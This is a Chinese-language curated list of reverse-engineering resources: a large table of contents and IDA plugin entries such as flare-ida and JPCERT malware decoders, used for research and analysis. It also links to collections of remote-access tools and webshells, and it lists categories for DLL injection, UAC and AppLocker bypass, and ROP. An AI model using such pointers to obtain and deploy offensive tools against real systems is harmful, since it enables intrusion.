- [开源远控和恶意远控分析报告: awesome-rat](https://github.com/alphaSeclab/awesome-rat): 开源远控工具: Windows/Linux/macOS/Android; 远控类恶意恶意代码的分析报告等
- [Webshell工具和分析/使用文章: awesome-webshell](https://github.com/alphaSeclab/awesome-webshell): Webshell资源收集, 包括150个Github项目, 200个左右文章
- [取证相关工具和文章: awesome-forensics](https://github.com/alphaSeclab/awesome-forensics): 近300个取开源证工具,近600与取证相关文章
# ReverseEngineering
- 跟逆向有关的资源收集。当前包括的工具个数3500+,并根据功能进行了粗糙的分类。部分工具添加了中文描述。当前包括文章数2300+。
- 此页只包含部分内容. [查看完整版](https://github.com/alphaSeclab/awesome-reverse-engineering/blob/master/Readme_full.md)
# 说明
[EnglishVersion](https://github.com/alphaSeclab/awesome-reverse-engineering/blob/master/Readme_en.md)
# 目录
- [Windows](#2f81493de610f9b796656b269380b2de)
- [PE](#620af0d32e6ac1f4a3e97385d4d3efc0)
- [(68) 工具](#574db8bbaafbee72eeb30e28e2799458)
- [(324) 文章](#7e890d391fa32df27beb1377a371518b)
- [DLL](#89f963773ee87e2af6f9170ee60a7fb2)
- [DLL注入](#3b4617e54405a32290224b729ff9f2b3)
- [(67) 工具](#b0d50ee42d53b1f88b32988d34787137)
- [(70) 文章](#1a0b0dab4cdbab08bbdc759bab70dbb6)
- [DLL劫持](#f39e40e340f61ae168b67424baac5cc6)
- [(60) 文章](#01e95333e07439ac8326253aa8950b4f)
- [(18) 工具](#c9cdcc6f4acbeda6c8ac8f4a1ba1ea6b)
- [新添加](#4dcfd9135aa5321b7fa65a88155256f9)
- [(16) 文章](#b05f4c5cdfe64e1dde2a3c8556e85827)
- [(107) 工具](#9753a9d52e19c69dc119bf03e9d7c3d2)
- [UAC](#40fd1488e4a26ebf908f44fdcedd9675)
- [(29) 工具](#02517eda8c2519c564a19219e97d6237)
- [(123) 文章](#90d7d5feb7fd506dc8fd6ee0d7e98285)
- [Sysmon](#0fed6a96b28f339611e7b111b8f42c23)
- [(12) 工具](#d48f038b58dc921660be221b4e302f70)
- [(131) 文章](#2c8cb7fdf765b9d930569f7c64042d62)
- [ETW](#ac43a3ce5a889d8b18cf22acb6c31a72)
- [(64) 文章](#11c4c804569626c1eb02140ba557bb85)
- [(35) 工具](#0af4bd8ca0fd27c9381a2d1fa8b71a1f)
- [AppLocker](#184bbacd8b9e08c30cc9ffcee9513f44)
- [(11) 工具](#8f1876dff78e80b60d00de25994276d9)
- [(93) 文章](#286317d6d7c1a0578d8f5db940201320)
- [工具](#b478e9a9a324c963da11437d18f04998)
- [(213) 其他](#1afda3039b4ab9a3a1f60b179ccb3e76)
- [(10) .NET](#d90b60dc79837e06d8ba2a7ee1f109d3)
- [新添加的](#f9fad1d4d1f0e871a174f67f63f319d8)
- [(5) Environment&&环境&&配置](#6d2fe834b7662ecdd48c17163f732daf)
- [进程注入](#8bfd27b42bb75956984994b3419fb582)
- [代码注入](#1c6069610d73eb4246b58d78c64c9f44)
- [内存模块](#7c1541a69da4c025a89b0571d8ce73d2)
- [(6) VT&&虚拟化&&Hypbervisor](#19cfd3ea4bd01d440efb9d4dd97a64d0)
- [(8) 内核&&驱动](#c3cda3278305549f4c21df25cbf638a4)
- [(3) 注册表](#920b69cea1fc334bbc21a957dd0d9f6f)
- [(4) 系统调用](#d295182c016bd9c2d5479fe0e98a75df)
- [(3) Procmon](#518d80dfb8e9dda028d18ace1d3f3981)
- [文章](#3939f5e83ca091402022cb58e0349ab8)
- [新添加](#8e1344cae6e5f9a33e4e5718a012e292)
- [(5) Procmon](#af06263e9a92f6036dc5d4c4b28b9d8c)
- [(68) DEP](#fa89526db1f9373c57ea4ffa1ac8c39f)
- [Linux](#dc664c913dc63ec6b98b47fcced4fdf0)
- [ELF](#a63015576552ded272a242064f3fe8c9)
- [(59) 工具](#929786b8490456eedfb975a41ca9da07)
- [(102) 文章](#72d101d0f32d5521d5d305e7e653fdd3)
- [工具](#89e277bca2740d737c1aeac3192f374c)
- [(99) 新添加](#203d00ef3396d68f5277c90279f4ebf3)
- [文章](#f6d78e82c3e5f67d13d9f00c602c92f0)
- [新添加](#bdf33f0b1200cabea9c6815697d9e5aa)
- [Apple&&iOS&&iXxx](#069664f347ae73b1370c4f5a2ec9da9f)
- [Mach-O](#830f40713cef05f0665180d840d56f45)
- [(28) 工具](#9b0f5682dc818c93c4de3f46fc3f43d0)
- [(24) 文章](#750700dcc62fbd83e659226db595b5cc)
- [越狱](#bba00652bff1672ab1012abd35ac9968)
- [(96) 工具](#ff19d5d94315d035bbcb3ef0c348c75b)
- [(14) 文章](#cbb847a025d426a412c7cd5d8a2332b5)
- [LLDB](#004d0b9e325af207df8e1ca61af7b721)
- [(11) 工具](#c20772abc204dfe23f3e946f8c73dfda)
- [(17) 文章](#86eca88f321a86712cc0a66df5d72e56)
- [XCode](#977cef2fc942ac125fa395254ab70eea)
- [(18) 工具](#7037d96c1017978276cb920f65be2297)
- [(49) 文章](#a2d228a68b40162953d3d482ce009d4e)
- [工具](#58cd9084afafd3cd293564c1d615dd7f)
- [(319) 新添加的](#d0108e91e6863289f89084ff09df39d0)
- [文章&&视频](#c97bbe32bbd26c72ceccb43400e15bf1)
- [新添加](#d4425fc7c360c2ff324be718cf3b7a78)
- [Android](#11a59671b467a8cdbdd4ea9d5e5d9b51)
- [工具](#2110ded2aa5637fa933cc674bc33bf21)
- [(183) 新添加的](#883a4e0dd67c6482d28a7a14228cd942)
- [(4) HotFix](#fa49f65b8d3c71b36c6924ce51c2ca0c)
- [(1) 打包](#ec395c8f974c75963d88a9829af12a90)
- [(2) 收集](#767078c52aca04c452c095f49ad73956)
- [(1) 各类App](#17408290519e1ca7745233afea62c43c)
- [(30) Xposed](#7f353b27e45b5de6b0e6ac472b02cbf1)
- [(19) 加壳&&脱壳](#50f63dce18786069de2ec637630ff167)
- [(12) HOOK](#596b6cf8fd36bc4c819335f12850a915)
- [(9) Emulator&&模拟器](#5afa336e229e4c38ad378644c484734a)
- [(6) IDA](#0a668d220ce74e11ed2738c4e3ae3c9e)
- [(11) Debug&&调试](#bb9f8e636857320abf0502c19af6c763)
- [(34) Malware&&恶意代码](#f975a85510f714ec3cc2551e868e75b8)
- [(5) Obfuscate&&混淆](#1d83ca6d8b02950be10ac8e4b8a2d976)
- [(15) ReverseEngineering](#6d2b758b3269bac7d69a2d2c8b45194c)
- [(319) 新添加的1](#63fd2c592145914e99f837cecdc5a67c)
- [(2) 文章&&视频](#f0493b259e1169b5ddd269b13cfd30e6)
- [IDA](#08e59e476824a221f6e4a69c0bba7d63)
- [插件&&脚本](#f11ab1ff46aa300cc3e86528b8a98ad7)
- [(97) 未分类](#c39a6d8598dde6abfeef43faf931beb5)
- [结构体&&类的检测&&创建&&恢复](#fb4f0c061a72fc38656691746e7c45ce)
- [(6) 未分类](#fa5ede9a4f58d4efd98585d3158be4fb)
- [(8) C++类&&虚表](#4900b1626f10791748b20630af6d6123)
- [(3) 收集](#a7dac37cd93b8bb42c7d6aedccb751b3)
- [(9) 外观&&主题](#fabf03b862a776bbd8bcc4574943a65a)
- [(4) 固件&&嵌入式设备](#a8f5db3ab4bc7bc3d6ca772b3b9b0b1e)
- [签名(FLIRT等)&&比较(Diff)&&匹配](#02088f4884be6c9effb0f1e9a3795e58)
- [(17) 未分类](#cf04b98ea9da0056c055e2050da980c1)
- [FLIRT签名](#19360afa4287236abe47166154bc1ece)
- [(3) FLIRT签名收集](#1c9d8dfef3c651480661f98418c49197)
- [(2) FLIRT签名生成](#a9a63d23d32c6c789ca4d2e146c9b6d0)
- [(11) Diff&&Match工具](#161e5a3437461dc8959cc923e6a18ef7)
- [(7) Yara](#46c9dfc585ae59fe5e6f7ddf542fb31a)
- [(6) IDB操作](#5e91b280aab7f242cbc37d64ddbff82f)
- [(5) 协作逆向&&多人操作相同IDB文件](#206ca17fc949b8e0ae62731d9bb244cb)
- [(9) 与调试器同步&&通信&&交互](#f7d311685152ac005cfce5753c006e4b)
- [导入导出&与其他工具交互](#6fb7e41786c49cc3811305c520dfe9a1)
- [(13) 未分类](#8ad723b704b044e664970b11ce103c09)
- [(5) Ghidra](#c7066b0c388cd447e980bf0eb38f39ab)
- [(3) BinNavi](#11139e7d6db4c1cef22718868f29fe12)
- [(3) BinaryNinja](#d1ff64bee76f6749aef6100d72bfbe3a)
- [(2) Radare2](#21ed198ae5a974877d7a635a4b039ae3)
- [(4) Frida](#a1cf7f7f849b4ca2101bd31449c2a0fd)
- [(2) IntelPin](#dd0332da5a1482df414658250e6357f8)
- [针对特定分析目标](#004c199e1dbf71769fbafcd8e58d1ead)
- [(26) 未分类](#5578c56ca09a5804433524047840980e)
- [(2) GoLang](#1b17ac638aaa09852966306760fda46b)
- [(4) Windows驱动](#4c158ccc5aee04383755851844fdd137)
- [(4) PS3&&PS4](#315b1b8b41c67ae91b841fce1d4190b5)
- [(33) Loader&Processor](#cb59d84840e41330a7b5e275c0b81725)
- [(4) PDB](#f5e51763bb09d8fd47ee575a98bedca1)
- [(2) Flash&&SWF](#7d0681efba2cf3adaba2780330cd923a)
- [(4) 特定样本家族](#841d605300beba45c3be131988514a03)
- [(1) CTF](#ad44205b2d943cfa2fa805b2643f4595)
- [IDAPython本身](#ad68872e14f70db53e8d9519213ec039)
- [(8) 未分类](#2299bc16945c25652e5ad4d48eae8eca)
- [(1) 清单](#c42137cf98d6042372b1fd43c3635135)
- [(6) 指令参考&文档](#846eebe73bef533041d74fc711cafb43)
- [辅助脚本编写](#c08ebe5b7eec9fc96f8eff36d1d5cc7d)
- [(9) 未分类](#45fd7cfce682c7c25b4f3fbc4c461ba2)
- [(3) Qt](#1a56a5b726aaa55ec5b7a5087d6c8968)
- [(3) 控制台&&窗口界面](#1721c09501e4defed9eaa78b8d708361)
- [(2) 插件模板](#227fbff77e3a13569ef7b007344d5d2e)
- [(2) 其他语言](#8b19bb8cf9a5bc9e6ab045f3b4fabf6a)
- [(16) 古老的](#dc35a2b02780cdaa8effcae2b6ce623e)
- [调试&&动态运行&动态数据](#e3e7030efc3b4de3b5b8750b7d93e6dd)
- [(10) 未分类](#2944dda5289f494e5e636089db0d6a6a)
- [(10) DBI数据](#0fbd352f703b507853c610a664f024d1)
- [(4) 调试数据](#b31acf6c84a9506066d497af4e702bf5)
- [(14) 反编译器&&AST](#d2166f4dac4eab7fadfe0fd06467fbc9)
- [(7) 反混淆](#7199e8787c0de5b428f50263f965fda7)
- [效率&&导航&&快速访问&&图形&&图像&&可视化 ](#fcf75a0881617d1f684bc8b359c684d7)
- [(15) 其他](#c5b120e1779b928d860ad64ff8d23264)
- [(9) 显示增强](#03fac5b3abdbd56974894a261ce4e25f)
- [(3) 图形&&图像](#3b1dba00630ce81cba525eea8fcdae08)
- [(3) 搜索](#8f9468e9ab26128567f4be87ead108d7)
- [(7) Android](#66052f824f5054aa0f70785a2389a478)
- [Apple&&macOS&&iXxx&&Objective-C&&SWift&&Mach-O](#2adc0044b2703fb010b3bf73b1f1ea4a)
- [(5) 未分类](#8530752bacfb388f3726555dc121cb1a)
- [(3) 内核缓存](#82d0fa2d6934ce29794a651513934384)
- [(3) Mach-O](#d249a8d09a3f25d75bb7ba8b32bd9ec5)
- [(3) Swift](#1c698e298f6112a86c12881fbd8173c7)
- [(9) ELF](#e5e403123c70ddae7bd904d3a3005dbb)
- [(5) Microcode](#7a2977533ccdac70ee6e58a7853b756b)
- [(6) 模拟器集成](#b38dab81610be087bd5bc7785269b8cc)
- [(4) 新添加的](#c39dbae63d6a3302c4df8073b4d1cdc8)
- [(4) 作为辅助&&构成其他的一环](#83de90385d03ac8ef27360bfcdc1ab48)
- [漏洞](#1ded622dca60b67288a591351de16f8b)
- [(7) 未分类](#385d6777d0747e79cccab0a19fa90e7e)
- [(2) ROP](#cf2efa7e3edb24975b92d2e26ca825d2)
- [(7) 补丁&&Patch](#7d557bc3d677d206ef6c5a35ca8b3a14)
- [(3) 其他](#7dfd8abad50c14cd6bdc8d8b79b6f595)
- [函数相关](#90bf5d31a3897400ac07e15545d4be02)
- [(4) 未分类](#347a2158bdd92b00cd3d4ba9a0be00ae)
- [(6) 重命名&&前缀&&标记](#73813456eeb8212fd45e0ea347bec349)
- [(5) 导航&&查看&&查找](#e4616c414c24b58626f834e1be079ebc)
- [(2) demangle](#cadae88b91a57345d266c68383eb05c5)
- [(3) 污点分析&&符号执行](#34ac84853604a7741c61670f2a075d20)
- [(8) 字符串](#9dcc6c7dd980bec1f92d0cc9a2209a24)
- [(3) 加密解密](#06d2caabef97cf663bd29af2b1fe270c)
- [文章](#18c6a45392d6b383ea24b363d2f3e76b)
- [(6) 系列文章-Labeless插件介绍](#04cba8dbb72e95d9c721fe16a3b48783)
- [(24) 系列文章-使用IDA从零开始学逆向](#1a2e56040cfc42c11c5b4fa86978cc19)
- [系列文章-IDAPython-让你的生活更美好](#e838a1ecdcf3d068547dd0d7b5c446c6)
- [(6) 原文](#7163f7c92c9443e17f3f76cc16c2d796)
- [(5) 译文](#fc62c644a450f3e977af313edd5ab124)
- [工具&&插件&&脚本介绍](#3d3bc775abd7f254ff9ff90d669017c9)
- [(51) 未分类](#cd66794473ea90aa6241af01718c3a7d)
- [(3) Loader&&Processor](#43a4761e949187bf737e378819752c3b)
- [(1) 与其他工具交互](#c7483f3b20296ac68084a8c866230e15)
- [(10) Tips&&Tricks](#a4bd25d3dc2f0be840e39674be67d66b)
- [(125) 未分类](#4187e477ebc45d1721f045da62dbf4e8)
- [(5) 翻译-TheIDAProBook](#ea11818602eb33e8b165eb18d3710965)
- [(2) 翻译-ReverseEngineeringCodeWithIDAPro](#ec5f7b9ed06500c537aa25851a3f2d3a)
- [(5) 系列文章-使用IDA逆向C代码](#8433dd5df40aaf302b179b1fda1d2863)
- [逆向实战](#d8e48eb05d72db3ac1e050d8ebc546e1)
- [(11) 未分类](#374c6336120363a5c9d9a27d7d669bf3)
- [(15) 恶意代码分析](#0b3e1936ad7c4ccc10642e994c653159)
- [(2) 漏洞分析&&挖掘](#03465020d4140590326ae12c9601ecfd)
- [(27) 新添加的](#37634a992983db427ce41b37dd9a98c2)
- [(4) IDA本身](#2120fe5420607a363ae87f5d2fed459f)
- [(1) Microcode](#e9ce398c2c43170e69c95fe9ad8d22fc)
- [(1) IDA对抗](#9c0ec56f402a2b9938417f6ecbaeaa72)
- [Ghidra](#319821036a3319d3ade5805f384d3165)
- [插件&&脚本](#fa45b20f6f043af1549b92f7c46c9719)
- [(12) 新添加的](#ce70b8d45be0a3d29705763564623aca)
- [特定分析目标](#69dc4207618a2977fe8cd919e7903fa5)
- [(4) 未分类](#da5d2b05da13f8e65aa26d6a1c95a8d0)
- [(18) Loader&&Processor](#058bb9893323f337ad1773725d61f689)
- [(2) Xbox](#51a2c42c6d339be24badf52acb995455)
- [与其他工具交互](#99e3b02da53f1dbe59e0e277ef894687)
- [(2) Radare2](#e1cc732d1388084530b066c26e24887b)
- [未分类](#5923db547e1f04f708272543021701d2)
- [(5) IDA](#d832a81018c188bf585fcefa3ae23062)
- [(1) DBI](#60e86981b2c98f727587e7de927e0519)
- [(1) 调试器](#e81053b03a859e8ac72f7fe79e80341a)
- [(1) 外观&&主题](#cccbd06c6b9b03152d07a4072152ae27)
- [(4) Ghidra](#2ae406afda6602c8f02d73678b2ff040)
- [脚本编写](#45910c8ea12447df9cdde2bea425f23f)
- [(1) 其他](#c12ccb8e11ba94184f8f24767eb64212)
- [(1) 编程语言](#b24e162720cffd2d2456488571c1a136)
- [文章&&视频](#273df546f1145fbed92bb554a327b87a)
- [(30) 新添加的](#ce49901b4914f3688ef54585c8f9df1a)
- [(4) Ghidra漏洞](#b7fb955b670df2babc67e5942297444d)
- [实战分析](#dd0d49a5e6bd34b372d9bbf4475e8024)
- [(3) 漏洞分析&&挖掘](#375c75af4fa078633150415eec7c867d)
- [(9) 未分类](#f0ab053d7a282ab520c3a327fc91ba2e)
- [(9) 恶意代码](#4e3f53845efe99da287b2cea1bdda97c)
- [其他](#92f60c044ed13b3ffde631794edd2756)
- [Tips&&Tricks](#4bfa6dcf708b3f896870c9d3638c0cde)
- [(5) 工具&&插件&&脚本](#0d086cf7980f65da8f7112b901fecdc1)
- [(15) 新添加的1](#8962bde3fbfb1d1130879684bdf3eed0)
- [x64dbg](#b1a6c053e88e86ce01bbd78c54c63a7c)
- [插件&&脚本](#b4a856db286f9f29b5a32d477d6b3f3a)
- [(63) 新添加的](#da5688c7823802e734c39b539aa39df7)
- [(1) x64dbg](#353ea40f2346191ecb828210a685f9db)
- [(21) 文章&&视频](#22894d6f2255dc43d82dd46bdbc20ba1)
- [OllyDbg](#37e37e665eac00de3f55a13dcfd47320)
- [插件&&脚本](#7834e399e48e6c64255a1a0fdb6b88f5)
- [(13) 新添加的](#92c44f98ff5ad8f8b0f5e10367262f9b)
- [(122) 文章&&视频](#8dd3e63c4e1811973288ea8f1581dfdb)
- [WinDBG](#0a506e6fb2252626add375f884c9095e)
- [插件&&脚本](#37eea2c2e8885eb435987ccf3f467122)
- [(67) 新添加的](#2ef75ae7852daa9862b2217dca252cc3)
- [(155) 文章&&视频](#6d8bac8bfb5cda00c7e3bd38d64cbce3)
- [Radare2](#86cb7d8f548ca76534b5828cb5b0abce)
- [插件&&脚本](#0e08f9478ed8388319f267e75e2ef1eb)
- [(76) 新添加的](#6922457cb0d4b6b87a34caf39aa31dfe)
- [(1) Radare2](#ec3f0b5c2cf36004c4dd3d162b94b91a)
- [与其他工具交互](#1a6652a1cb16324ab56589cb1333576f)
- [(4) 未分类](#dfe53924d678f9225fc5ece9413b890f)
- [(3) IDA](#1cfe869820ecc97204a350a3361b31a7)
- [GUI](#f7778a5392b90b03a3e23ef94a0cc3c6)
- [(4) GUI](#8f151d828263d3bc038f75f8d6418758)
- [(5) Cutter](#df45c3c60bd074e21d650266aa85c241)
- [文章&&视频](#95fdc7692c4eda74f7ca590bb3f12982)
- [(167) 未分类](#a4debf888d112b91e56c90136f513ec0)
- [(5) Cutter](#d86e19280510aee0bcf2599f139cfbf7)
- [Cuckoo](#0ae4ddb81ff126789a7e08b0768bd693)
- [工具](#5830a8f8fb3af1a336053d84dd7330a1)
- [(40) 新添加的](#f2b5c44c2107db2cec6c60477c6aa1d0)
- [(62) 文章&&视频](#ec0a441206d9a2fe1625dce0a679d466)
- [BinaryNinja](#afb7259851922935643857c543c4b0c2)
- [插件&&脚本](#3034389f5aaa9d7b0be6fa7322340aab)
- [(58) 新添加的](#a750ac8156aa0ff337a8639649415ef1)
- [与其他工具交互](#bba1171ac550958141dfcb0027716f41)
- [(2) 未分类](#c2f94ad158b96c928ee51461823aa953)
- [(3) IDA](#713fb1c0075947956651cc21a833e074)
- [(12) 文章&&视频](#2d24dd6f0c01a084e88580ad22ce5b3c)
- [DBI](#7ab3a7005d6aa699562b3a0a0c6f2cff)
- [DynamoRIO](#c8cdb0e30f24e9b7394fcd5681f2e419)
- [工具](#6c4841dd91cb173093ea2c8d0b557e71)
- [(8) 新添加的](#ff0abe26a37095f6575195950e0b7f94)
- [(2) DynamoRIO](#3a577a5b4730a1b5b3b325269509bb0a)
- [(3) 与其他工具交互](#928642a55eff34b6b52622c6862addd2)
- [(15) 文章&&视频](#9479ce9f475e4b9faa4497924a2e40fc)
- [IntelPin](#7b8a493ca344f41887792fcc008573e7)
- [工具](#fe5a6d7f16890542c9e60857706edfde)
- [(18) 新添加的](#78a2edf9aa41eb321436cb150ea70a54)
- [与其他工具交互](#e6a829abd8bbc5ad2e5885396e3eec04)
- [(8) 未分类](#e129288dfadc2ab0890667109f93a76d)
- [文章&&视频](#226190bea6ceb98ee5e2b939a6515fac)
- [Frida](#f24f1235fd45a1aa8d280eff1f03af7e)
- [工具](#a5336a0f9e8e55111bda45c8d74924c1)
- [(100) 新添加的](#54836a155de0c15b56f43634cd9cfecf)
- [与其他工具交互](#74fa0c52c6104fd5656c93c08fd1ba86)
- [(1) 未分类](#00a86c65a84e58397ee54e85ed57feaf)
- [(3) IDA](#d628ec92c9eea0c4b016831e1f6852b3)
- [(2) BinaryNinja](#f9008a00e2bbc7535c88602aa79c8fd8)
- [(2) Radare2](#ac053c4da818ca587d57711d2ff66278)
- [(1) Frida](#6d3c24e43835420063f9ca50ba805f15)
- [(92) 文章&&视频](#a1a7e3dd7091b47384c75dba8f279caf)
- [QBDI](#b2fca17481b109a9b3b0bc290a1a1381)
- [(1) 工具](#e72b766bcd3b868c438a372bc365221e)
- [(6) 文章&&视频](#2cf79f93baf02a24d95d227a0a3049d8)
- [其他](#5a9974bfcf7cdf9b05fe7a7dc5272213)
- [(4) 工具](#104bc99e36692f133ba70475ebc8825f)
- [(1) 文章&&视频](#8f1b9c5c2737493524809684b934d49a)
- [其他](#d3690e0b19c784e104273fe4d64b2362)
- [ 文章-新添加的](#9162e3507d24e58e9e944dd3f6066c0e)
- [(284) 工具-新添加的](#1d9dec1320a5d774dc8e0e7604edfcd3)
- [(3) 工具-其他](#bc2b78af683e7ba983205592de8c3a7a)
- [angr](#4fe330ae3e5ce0b39735b1bfea4528af)
- [(27) 工具](#1ede5ade1e55074922eb4b6386f5ca65)
- [(4) 文章](#042ef9d415350eeb97ac2539c2fa530e)
- [Debug&&调试](#324874bb7c3ead94eae6f1fa1af4fb68)
- [(116) 工具](#d22bd989b2fdaeda14b64343b472dfb6)
- [文章](#136c41f2d05739a74c6ec7d8a84df1e8)
- [BAP](#9f8d3f2c9e46fbe6c25c22285c8226df)
- [(26) 工具](#f10e9553770db6f98e8619dcd74166ef)
- [文章](#e111826dde8fa44c575ce979fd54755d)
- [BinNavi](#2683839f170250822916534f1db22eeb)
- [(3) 工具](#2e4980c95871eae4ec0e76c42cc5c32f)
- [(5) 文章](#ff4dc5c746cb398d41fb69a4f8dfd497)
- [Decompiler&&反编译器](#0971f295b0f67dc31b7aa45caf3f588f)
- [(73) 工具](#e67c18b4b682ceb6716388522f9a1417)
- [文章](#a748b79105651a8fd8ae856a7dc2b1de)
- [Disassemble&&反汇编](#2df6d3d07e56381e1101097d013746a0)
- [(30) 工具](#59f472c7575951c57d298aef21e7d73c)
- [文章](#a6eb5a22deb33fc1919eaa073aa29ab5)
- [GDB](#975d9f08e2771fccc112d9670eae1ed1)
- [(80) 工具](#5f4381b0a90d88dd2296c2936f7e7f70)
- [(102) 文章](#37b17362d72f9c8793973bc4704893a2)
- [Monitor&&监控&&Trace&&追踪](#70e64e3147675c9bcd48d4f475396e7f)
- [(29) 工具](#cd76e644d8ddbd385939bb17fceab205)
- [TODO](#35f8efcff18d0449029e9d3157ac0899)
# <a id="35f8efcff18d0449029e9d3157ac0899"></a>TODO
- 对工具进行更细致的分类
- 为工具添加详细的中文描述,包括其内部实现原理和使用方式
- 添加非Github repo
- 补充文章
- 修改已添加文章的描述
# <a id="08e59e476824a221f6e4a69c0bba7d63"></a>IDA
***
## <a id="f11ab1ff46aa300cc3e86528b8a98ad7"></a>插件&&脚本
- 以Github开源工具为主
### <a id="c39dbae63d6a3302c4df8073b4d1cdc8"></a>新添加的
### <a id="c39a6d8598dde6abfeef43faf931beb5"></a>未分类
- [**1058**星][17d] [Py] [fireeye/flare-ida](https://github.com/fireeye/flare-ida) 多工具
- [StackStrings](https://github.com/fireeye/flare-ida/blob/master/plugins/stackstrings_plugin.py) 自动恢复手动构造的字符串
- [Struct Typer](https://github.com/fireeye/flare-ida/blob/master/plugins/struct_typer_plugin.py) implements the struct typing described [here](https://www.mandiant.com/blog/applying-function-types-structure-fields-ida/)
- [ApplyCalleeType](https://github.com/fireeye/flare-ida/blob/master/python/flare/apply_callee_type.py) specify or choose a function type for indirect calls as described [here](https://www.fireeye.com/blog/threat-research/2015/04/flare_ida_pro_script.html)
- [argtracker](https://github.com/fireeye/flare-ida/blob/master/python/flare/argtracker.py) 识别函数使用的静态参数
- [idb2pat](https://github.com/fireeye/flare-ida/blob/master/python/flare/idb2pat.py) FLIRT签名生成
- [objc2_analyzer](https://github.com/fireeye/flare-ida/blob/master/python/flare/objc2_analyzer.py) 在目标Mach-O可执行文件的与Objective-C运行时相关的部分中定义的选择器引用及其实现之间创建交叉引用
- [MSDN Annotations](https://github.com/fireeye/flare-ida/tree/master/python/flare/IDB_MSDN_Annotator) 从XML文件中提取MSDN信息,添加到IDB数据库中
- [ironstrings](https://github.com/fireeye/flare-ida/tree/master/python/flare/ironstrings) 使用代码模拟执行(flare-emu), 恢复构造的字符串
- [Shellcode Hashes](https://github.com/fireeye/flare-ida/tree/master/shellcode_hashes) 生成Hash数据库
- [**737**星][7m] [Py] [devttys0/ida](https://github.com/devttys0/ida) IDA插件/脚本/模块收集
- [wpsearch](https://github.com/devttys0/ida/blob/master/scripts/wpsearch.py) 查找在MIPS WPS checksum实现中常见的立即数
- [md5hash](https://github.com/devttys0/ida/tree/master/modules/md5hash) 纯Python版的MD5 hash实现(IDA的hashlib有问题)
- [alleycat](https://github.com/devttys0/ida/tree/master/plugins/alleycat) 查找向指定的函数内代码块的路径、查找两个或多个函数之间的路径、生成交互式调用图、可编程
- [codatify](https://github.com/devttys0/ida/tree/master/plugins/codatify) 定义IDA自动化分析时miss的ASCII字符串、函数、代码。将data段的所有未定义字节转换为DWORD(于是IDA可识别函数和跳转表指针)
- [fluorescence](https://github.com/devttys0/ida/tree/master/plugins/fluorescence) 高亮函数调用指令
- [leafblower](https://github.com/devttys0/ida/tree/master/plugins/leafblower) 识别常用的POSIX函数:printf, sprintf, memcmp, strcpy等
- [localxrefs](https://github.com/devttys0/ida/tree/master/plugins/localxrefs) 在当前函数内部查找所有对任意选择文本的引用
- [mipslocalvars](https://github.com/devttys0/ida/tree/master/plugins/mipslocalvars) 对栈上只用于存储寄存器的变量进行命名,简化栈数据分析(MISP)
- [mipsrop](https://github.com/devttys0/ida/tree/master/plugins/mipsrop) 在MIPS可执行代码中搜寻ROP。查找常见的ROP
- [rizzo](https://github.com/devttys0/ida/tree/master/plugins/rizzo) 对2个或多个IDB之间的函数进行识别和重命名,基于:函数签名、对唯一字符串/常量的引用、模糊签名、调用图
- [**318**星][2m] [C] [ohjeongwook/darungrim](https://github.com/ohjeongwook/darungrim) 软件补丁分析工具
- [IDA插件](https://github.com/ohjeongwook/darungrim/tree/master/Src/IDAPlugin)
- [DGEngine](https://github.com/ohjeongwook/darungrim/tree/master/Src/DGEngine)
- [**277**星][4m] [Py] [jpcertcc/aa-tools](https://github.com/jpcertcc/aa-tools) 多脚本
- [apt17scan.py](https://github.com/jpcertcc/aa-tools/blob/master/apt17scan.py) Volatility插件, 检测APT17相关的恶意代码并提取配置
- [emdivi_postdata_decoder](https://github.com/jpcertcc/aa-tools/blob/master/emdivi_postdata_decoder.py) 解码Emdivi post的数据
- [emdivi_string_decryptor](https://github.com/jpcertcc/aa-tools/blob/master/emdivi_string_decryptor.py) IDAPython脚本, 解密Emdivi内的字符串
- [citadel_decryptor](https://github.com/jpcertcc/aa-tools/tree/master/citadel_decryptor) Data decryption tool for Citadel
- [adwind_string_decoder](https://github.com/jpcertcc/aa-tools/blob/master/adwind_string_decoder.py) Python script for decoding strings inside Adwind
- [redleavesscan](https://github.com/jpcertcc/aa-tools/blob/master/redleavesscan.py) Volatility plugin for detecting RedLeaves and extracting its config
- [datper_splunk](https://github.com/jpcertcc/aa-tools/blob/master/datper_splunk.py) Python script for detects Datper communication and adds result field to Splunk index
- [datper_elk](https://github.com/jpcertcc/aa-tools/blob/master/datper_elk.py) Python script for detects Datper communication and adds result field to Elasticsearch index
- [tscookie_decode](https://github.com/jpcertcc/aa-tools/blob/master/tscookie_decode.py) Python script for decrypting and parsing TSCookie configure data
- [wellmess_cookie_decode](https://github.com/jpcertcc/aa-tools/blob/master/wellmess_cookie_decode.py) Python script for decoding WellMess's cookie data (support Python2)
- [cobaltstrikescan](https://github.com/jpcertcc/aa-tools/blob/master/cobaltstrikescan.py) Volatility plugin for detecting Cobalt Strike Beacon and extracting its config
- [tscookie_data_decode](https://github.com/jpcertcc/aa-tools/blob/master/tscookie_data_decode.py) Python script for decrypting and parsing TSCookie configure data
### <a id="fb4f0c061a72fc38656691746e7c45ce"></a>结构体&&类的检测&&创建&&恢复
#### <a id="fa5ede9a4f58d4efd98585d3158be4fb"></a>未分类
- [**931**星][25d] [OCaml] [airbus-seclab/bincat](https://github.com/airbus-seclab/bincat) 二进制代码静态分析工具。值分析(寄存器、内存)、污点分析、类型重建和传播(propagation)、前向/后向分析
- 重复区段: [IDA->插件->污点分析](#34ac84853604a7741c61670f2a075d20) |
- [**664**星][27d] [Py] [igogo-x86/hexrayspytools](https://github.com/igogo-x86/hexrayspytools) 结构体和类重建插件
#### <a id="4900b1626f10791748b20630af6d6123"></a>C++类&&虚表
- [**607**星][3m] [Py] [0xgalz/virtuailor](https://github.com/0xgalz/virtuailor) 利用IDA调试获取的信息,自动创建C++的虚表
- 重复区段: [IDA->插件->调试->调试数据](#b31acf6c84a9506066d497af4e702bf5) |
<details>
<summary>查看详情</summary>
## 静态部分:
- 检测非直接调用
- 利用条件断点, Hook非直接调用的值赋值过程
## 动态 部分
- 创建虚表结构
- 重命名函数和虚表地址
- 给反汇编非直接调用添加结构偏移
- 给非直接调用到虚表之间添加交叉引用
## 使用
- File -> Script File -> Main.py(设置断点) -> IDA调试器执行
</details>
### <a id="a7dac37cd93b8bb42c7d6aedccb751b3"></a>收集
- [**1771**星][10d] [onethawt/idaplugins-list](https://github.com/onethawt/idaplugins-list) IDA插件收集
- [**363**星][9m] [fr0gger/awesome-ida-x64-olly-plugin](https://github.com/fr0gger/awesome-ida-x64-olly-plugin) IDA x64DBG OllyDBG 插件收集
- 重复区段: [x64dbg->插件->新添加的](#da5688c7823802e734c39b539aa39df7) |
